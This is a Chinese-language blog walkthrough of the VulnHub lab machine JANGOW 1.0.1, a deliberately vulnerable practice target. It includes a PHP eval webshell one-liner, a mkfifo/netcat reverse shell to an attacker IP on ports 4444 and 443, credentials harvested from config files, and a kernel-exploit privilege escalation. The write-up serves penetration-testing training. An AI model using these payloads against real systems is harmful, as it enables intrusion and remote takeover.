每周打靶练习之JANGOW:1.0.1

最新推荐文章于 2025-01-16 15:30:45 发布
原创 最新推荐文章于 2025-01-16 15:30:45 发布 · 577 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全

打开虚拟机,选择NAT模式

接下来我们使用kali中的nmap进行主机IP扫描发现132主机开启21和80端口。

接下来我们去访问192.168.13.132:80然后访问site目录

使用dirmap进行目录扫描出现一个busque.php但是点进去之后是一个空白页

之后在原来的页面下随便点击功能点发现Buscar点进去就是刚刚扫描出来的空白页但是后面多了个参数,试试命令执行。

发现可以输入我们想要执行的命令,接下来进行反弹shell。

但是试了很多种反弹shell就是没有弹回来,可能靶机做了什么防火墙出站策略的吧。

那接下来就只能写入一句话木马进行上线了写入echo ‘<?php eval($_POST[cmd]);?>’ >1.php

查看发现写入成功,接下来去访问执行进行哥斯拉连接。

哥斯拉连接成功

发现该目录下还有一个wordpress目录,进去发现一个config配置文件,有数据库账号密码

desafio02

Abygurl69

但是权限不够连接该用户数据库

在html目录下发现隐藏文件.backup进去发现又有一个账号密码

Jangow01

Abygurl69

权限还是不够,应该需要我们去提权

在jiangow01用户目录下发现.user.txt拿去md5解密发现是空密码

接下来我们在哥斯拉上弹回一个交互式shell

写入一个php文件<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.64.46 4444 >/tmp/f");?>

然后试了各种方法都没有反弹回来,后来发现靶机只能通过443端口通信所以我们对命令进行一个修改

<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.64.46 443 >/tmp/f");?>

终于弹回了shell,然后我们靶机安装有python3,使用python调用交互式shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

使用刚刚获取的密码登录jiangow01用户

Sudo -l命令用不了只能jiangow01的sudo命令

接下来我们试试内核提权unmae -a

是ubuntu4.4.0-31的系统然后我们看看有没有可以用的exp

我们选择一个下载后上传上去,先上传到网站目录下我们在移到家目录下然后赋予权限

执行./exp发现提权成功

然后进入/root目录找到flag渗透测试结束

ChefY30
关注
jangow-01-1.0.1
qq_46140711的博客
09-22 1321
jangow-01-1.0.1靶机练习
VulnHub靶机-Jangow: 1.0.1
weixin_46694260的博客
09-15 2930
迟到的文章,就当库存发出来吧~
Vulnhub靶机:jangow-01-1.0.1
qq_48904485的博客
01-03 702
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:jangow0110.0.2.4)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/jangow-101,754/
Vulnhub靶机:JANGOW_ 1.0.1
LainWith的博客
10-06 1386
Jangow(此系列共1台)发布日期:202111月4日难度:低提示信息:爆破是拿下靶机的重要手段目标:取得 root 权限 + Flag主机发现端口扫描路径枚举命令执行反弹shellftp利用内核提权靶机练习-JANGOW: 1.0.1
Vulnhub靶机随笔-Jangow 1.0.1
weixin_59005129的博客
03-21 778
C.提权 内核提权 第三步 通过SCP将45010.c文件从Linux中传输到物理机中 在Windows的cmd中输入下方命令 这里需要将ssh的配置文件更改为允许root登录 命令: scp root@攻击机IP:文件所在位置 ./ 第五步 通过gcc编译45010.c文件 命令: gcc 45010.c -o exp 这里不用加-c参数
vulnhub 靶机 Jangow: 1.0.1
qq_44029310的博客
06-11 3779
一次打靶记录。
vulnhub靶场,JANGOW: 1.0.1
kukudeshuo的博客
02-17 2646
vulnhub靶场,JANGOW: 1.0.1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/jangow-101,754/ 攻击机:kali(192.168.109.128) 靶机:JANGOW: 1.0.1192.168.109.198) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 目标:提升为root权限获取root目录下的flag 信息收集 使用arp-scan确定目标靶机 确定目标靶机
Vulnhub靶场 Jangow: 1.0.1 练习
Reset
11-22 1340
netdiscover探测目标主机ip。nmap探测开放的端口和服务。扫描站点目录。发现账号密码敏感信息。发现命令执行的点。在命令执行处进行反弹shell。获取系统的版本信息,进行内核提权。
vulnhub靶场实战(JANGOW:1.0.1
blackguest07的博客
01-10 529
vulnhub实战(JANGOW:1.0.1
Jangow-1.0.1靶机
m0_61995767的博客
07-14 366
Jangow-1.0.1打靶记录
Jangow-1.0.1打靶渗透【附POC】
网安学习
07-12 388
存在回显,可以利用,尝试写入一句话木马;存在敏感信息database、username、password;逐个点击到Buscar时跳转到空白页面,但是存在疑似可以利用的功能点。逐个点击页面存在的内容,查看是否有可以利用的点;尝试使用蚁剑连接->连接成功。
Jangow-1.0.1 靶机教程
weixin_57682301的博客
07-31 251
4.在这里输入一句话木马 echo '<?6.打开蚂剑直接连接成功,即可进入。2.逐个点击页面中可以点击的位置。1.扫描目标主机地址。3.输入id发现有回显。5.输入ls查看文件。
VULNHUB中的jangow01-1.0.1
最新发布
在Web和Reverse坑里游泳中。。。。
01-16 881
经过查询资料之后发现是kali的编译版本太高了,靶机使用的版本是2.23,kali的版本为2.38。收获满满的,一开始是想用‘bash -i >& /dev/tcp/ip/port 0>&1 ’连接nc,但是反弹不出来,所以才写的一句话,结果没想到绕来绕去的还是用了蚁剑。不断思考,下载的POC没有问题,一定是编译的问题,编译改了版本仍然报错,是不是上传的文件有问题?上来就踩坑,还是用的小套路,扫描存活IP,结果扫了个寂寞,求助了大佬才知道,原来是靶机的设定网卡和运行使用的网卡不是一个。并存在site目录。
靶场练习No.1 Vulnhub靶场JANGOW01
hljzzj的博客
01-13 3221
2022年开始了,去年的6月份开始断断续续学习了半年的渗透知识,为了能持之以恒我恢复了以前不用的公众号,将我所学的内容用练习靶机的方式发布出来,也许会帮助到想入门的小伙伴们,也为了监督自己,今年的目标是200个靶机练习,小伙伴们让我们一起卷起来吧!
Vulnhub项目:jangow01
Ays.Ie的博客
03-12 311
该篇记录了vulnhub项目:jangow01靶机
VulnHub | Jangow 1.0.1
薛定的餓貓
12-05 3287
VulnHub | Jangow 1.0.1 项目地址 http://www.vulnhub.com/entry/jangow-101,754/ 难度:Easy 测试环境 攻击机:Parrot 192.168.56.104 目标靶机:Ubuntu 192.168.56.118 信息收集 开启目标靶机,登陆界面有其IP地址,不用自己手动扫描。但是还是要用nmap扫一下开启了什么端口。sudo nmap -sS -n -p- 192.168.56.118,然后使用-sV参数查看开放端口的详细信息。 打开网页
vulnhub靶场4:jangow01
Genarior的专栏
04-24 255
13、通过蚁剑上传,编译,并执行。提权成功,cat /root/proof.txt。12、通过searchsploit查看是否有可以提权的点,找到45010.c。11、查看系统版本,ubuntu 16.04 内核版本4.4.0-31。3、开放21、80端口,访问http看看,发现命令执行。8、使用蚁剑写入管道方式的反弹shell脚本。1、当nc -e被裁剪,使用管道反弹shell。7、nc没有-e选项,无法反弹shell。6、蚁剑连接 ,找到几个密码。9、443端口成功反弹。3、查看系统提权exp。
vulnhub——jangow-01-1.0.1靶机
Re1_zf的博客
10-28 1317
我这里/出不来,所以采用的方式就是先cd到根目录,再cd到interfaces文件的目录,在当前目录使用vi修改文件内容。修改完成后按F10或ctrl+x启动(如果没有进入下面的界面,按F10或ctrl+x的时候同步按回车)修改网卡为自己的网卡(这里的自己的网卡不是本机的网卡,而是上面ifconfig -a出来的靶机的网卡)但是在蚁剑的虚拟终端执行后是没有反应的,必须使用反弹的交互式shell。但是加权限执行后没用,看了一下发现大小为0,传输的有问题应该。这里可以简单操作,但是使用这个虚拟终端无法提权。
jangow-01-1.0.1靶机复现
weixin_62162207的博客
07-30 464
jangow-01-1.0.1靶机复现
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值